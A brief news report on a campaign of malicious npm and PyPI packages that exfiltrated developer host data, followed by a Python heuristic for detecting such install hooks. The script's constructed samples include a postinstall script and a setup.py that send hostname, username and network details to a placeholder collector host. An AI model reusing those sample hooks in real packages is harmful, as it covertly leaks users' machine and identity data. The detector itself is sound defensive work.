Malicious PyPI, NPM packages facilitate data exfiltration

Forty-five malicious NPM and PyPI packages have been deployed by threat actors to support extensive data theft operations as part of a campaign that commenced on Sept. 12, according to BleepingComputer. The campaign, initially discovered by Sonatype researchers, distributed the malicious packages in seven or more attack waves; the first wave delivered 33 packages between Sept. 12 and 15, a report from Phylum showed. Packages uploaded in the first waves contained hardcoded data-gathering and exfiltration capabilities, while the later packages added more sophisticated capabilities and analysis-evasion features. Researchers found that the packages exfiltrated hostnames, usernames, external and internal IP addresses, OS versions, and other machine and user information, which malicious actors could leverage to expose developer identities, upload malicious containers, obtain sensitive information, and potentially deploy ransomware.
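As an added defender-side illustration (not code from the reports cited above), the following heuristic flags install-time package code that combines host profiling (hostname, username, interfaces, OS details) with an outbound network call, the pattern the campaign's packages were reported to use. The npm manifest, install script and setup.py samples are constructed, and the collector host names are placeholders.

```python
import json
import re

# Constructed samples (not taken from the reported packages): an npm manifest whose
# postinstall hook runs a script, that script, a setup.py, and a benign setup.py.
SAMPLE_PACKAGE_JSON = '{"name": "demo", "version": "1.0.0", "scripts": {"postinstall": "node install.js"}}'
SAMPLE_INSTALL_JS = (
    'const os = require("os"); const https = require("https");\n'
    'const info = {h: os.hostname(), u: os.userInfo().username, n: os.networkInterfaces()};\n'
    'https.request({host: "collector.invalid", method: "POST"}).end(JSON.stringify(info));\n'
)
SAMPLE_SETUP_PY = (
    "import socket, urllib.request\nfrom setuptools import setup\n"
    'urllib.request.urlopen("http://collector.invalid", data=socket.gethostname().encode())\n'
    'setup(name="demo")\n'
)
BENIGN_SETUP_PY = 'from setuptools import setup\nsetup(name="demo", version="1.0")\n'

# Calls that profile the host: hostname, username, interfaces/IPs, OS details.
RECON_PATTERNS = [
    r"os\.hostname\(", r"os\.userInfo\(", r"os\.networkInterfaces\(", r"os\.platform\(",
    r"socket\.gethostname\(", r"getpass\.getuser\(", r"os\.getlogin\(",
    r"platform\.(?:uname|platform|version)\(",
]
# Calls that send data off the machine from install-time code.
NETWORK_PATTERNS = [
    r"urllib\.request\.urlopen\(", r"requests\.(?:post|get)\(", r"https?\.request\(",
    r"fetch\(", r"socket\.connect\(",
]
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")


def lifecycle_scripts(package_json: str) -> dict:
    """Return the npm scripts that run automatically during `npm install`."""
    scripts = json.loads(package_json).get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in LIFECYCLE_HOOKS}


def assess_source(source: str) -> dict:
    """Flag install-time code that both profiles the host and reaches the network."""
    recon = [p for p in RECON_PATTERNS if re.search(p, source)]
    network = [p for p in NETWORK_PATTERNS if re.search(p, source)]
    return {"recon": recon, "network": network, "flagged": bool(recon and network)}


if __name__ == "__main__":
    print("npm lifecycle hooks:", lifecycle_scripts(SAMPLE_PACKAGE_JSON))
    for label, src in [("install.js", SAMPLE_INSTALL_JS), ("setup.py", SAMPLE_SETUP_PY),
                       ("benign setup.py", BENIGN_SETUP_PY)]:
        print(label, assess_source(src))
```

A real review would run this over every lifecycle hook target and setup.py in a package before it is installed, treating a hit as a reason for manual inspection rather than proof of malice.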
